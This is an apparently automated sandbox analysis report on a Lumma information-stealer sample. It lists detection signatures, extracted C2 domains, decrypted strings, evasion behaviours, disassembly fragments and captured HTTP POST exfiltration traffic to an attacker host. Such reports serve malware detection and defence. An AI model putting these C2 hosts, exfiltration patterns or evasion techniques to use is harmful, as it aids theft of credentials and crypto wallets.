Edit tour

Windows Analysis Report
download.bin.exe

Overview

General Information

Sample name:	download.bin.exe
Analysis ID:	1583959
MD5:	47bd83617560c80c7e805b546ea2a258
SHA1:	09daba42fcaba0481d72e26a201d4eb442a842b9
SHA256:	ec8cd0b52b6d8839d69c9ceb691cd5a92d183394b749c5ba354d31e124cc4557
Tags:	exeuser-AzakaSekai
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

download.bin.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\download.bin.exe" MD5: 47BD83617560C80C7E805B546EA2A258)

download.bin.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\download.bin.exe" MD5: 47BD83617560C80C7E805B546EA2A258)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "traygullibalkerj.click", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "WG6I6S--web55"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1704566054.00000000059C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: download.bin.exe PID: 7068	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: download.bin.exe PID: 7068	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: download.bin.exe PID: 5440	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.download.bin.exe.59c0000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T23:02:59.297255+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-03T23:03:00.467153+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-03T23:03:01.598032+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.112.1	443	TCP
2025-01-03T23:03:02.755571+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.112.1	443	TCP
2025-01-03T23:03:03.832507+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.112.1	443	TCP
2025-01-03T23:03:05.054256+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.112.1	443	TCP
2025-01-03T23:03:06.331896+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.112.1	443	TCP
2025-01-03T23:03:09.549788+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T23:02:59.811804+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-03T23:03:00.921236+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-03T23:03:10.032934+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T23:02:59.811804+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T23:03:00.921236+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.112.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T23:03:03.308259+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.112.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.download.bin.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "traygullibalkerj.click", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "WG6I6S--web55"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: download.bin.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: traygullibalkerj.click
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: WG6I6S--web55

Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00415650 CryptUnprotectData,		1_2_00415650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00415650 CryptUnprotectData,		1_2_00415650

Source: download.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: download.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: download.bin.exe, 00000000.00000002.1702508061.0000000004269000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1705279369.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: download.bin.exe, 00000000.00000002.1702508061.0000000004269000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1705279369.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_01840825
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_0184082C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C3A5B5h	0_2_05C3A57E
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C3A5B5h	0_2_05C3A400
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C37A5Bh	0_2_05C376A1
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C37A5Bh	0_2_05C376B0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C3A5B5h	0_2_05C3A3F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C37EAAh	0_2_05C37E10
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05C37EAAh	0_2_05C37E20
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov eax, dword ptr [ebp-20h]	0_2_05D22210
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05D6E2A8h	0_2_05D6E1F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp 05D6E2A8h	0_2_05D6E1E8
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then xor byte ptr [esp+eax+38h], al	1_2_0041F970
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Dh]	1_2_0041F970
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-643250A7h]	1_2_00443920
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042F9CD
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, eax	1_2_004411EB
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov edx, dword ptr [ebp-1Ch]	1_2_0040BA65
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_0042F216
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-52h]	1_2_0040AC10
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]	1_2_00440CF7
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042ED19
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_00415650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0973104Dh]	1_2_0040E627
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+65694AD3h]	1_2_0043BF70
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 13884179h	1_2_0043F840
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov esi, dword ptr [0044D5B8h]	1_2_0040E060
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, eax	1_2_0041B06A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0041B06A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+16h]	1_2_00409870
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-50A86D4Ch]	1_2_0041B873
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00439800
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 75827ABFh	1_2_0041902D
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov eax, ebx	1_2_0040B090
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then test esi, esi	1_2_0043D100
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+20h]	1_2_00419930
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-1588BA3Ah]	1_2_00419930
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_004189EC
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 75827ABFh	1_2_004189EC
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp eax	1_2_0040B9F2
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041C1FF
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	1_2_0042D200
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [ecx], bl	1_2_00430209
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	1_2_0043FA20
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_00442AC0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [ecx], bp	1_2_0041CAE4
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [ecx], bp	1_2_0041CAFB
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, edx	1_2_0042DA80
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, eax	1_2_0040CB57
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp dword ptr [0044ACD4h]	1_2_0042AB24
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042BBD0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, dword ptr [esi+74h]	1_2_0042FB83
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0042FB83
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0042FB83
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edi], 00000020h	1_2_0042F385
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_004163B4
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp cl, 0000002Eh	1_2_0042844F
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	1_2_0041741A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+30h]	1_2_0041741A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_0044241B
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edx], cl	1_2_00409430
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov esi, eax	1_2_00429CE2
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h]	1_2_0043D497
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp ax, cx	1_2_0043D497
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041F4B0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov eax, ecx	1_2_004204BD
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	1_2_004204BD
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov ecx, eax	1_2_004204BD
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov eax, dword ptr [00448D2Ch]	1_2_0040E55C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov esi, ecx	1_2_00414D00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [eax+edx*8], 6206A877h	1_2_00414D00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [eax+edx*8], 8A6ED578h	1_2_00414D00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h	1_2_0042AD03
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+0Ch]	1_2_0043CD00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then push ebx	1_2_0043CD00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_00442500
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042ED27
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 05DB9CB0h	1_2_004435E0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_0042F5EB
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_00415650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_00442650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-042A6207h]	1_2_00426E5A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042E670
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042E612
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]	1_2_00407620
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_00407620
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0000012Fh]	1_2_00416E3C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000140h]	1_2_00416E3C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then lea ecx, dword ptr [esp+00000090h]	1_2_00416E3C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042D6C0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_004426F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then jmp ecx	1_2_00442780
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 75827ABFh	1_2_00418F90
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+6E5E7207h]	1_2_00425796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.112.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: traygullibalkerj.click
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop

Source: Joe Sandbox View

IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=279JXMJWCB6HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18127Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WJB88NK0NUISPTVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8766Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GLAZF8MAVNQQBS8RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20425Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CI2959RYGCA8KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRCJPPX0EFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587483Host: traygullibalkerj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: traygullibalkerj.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

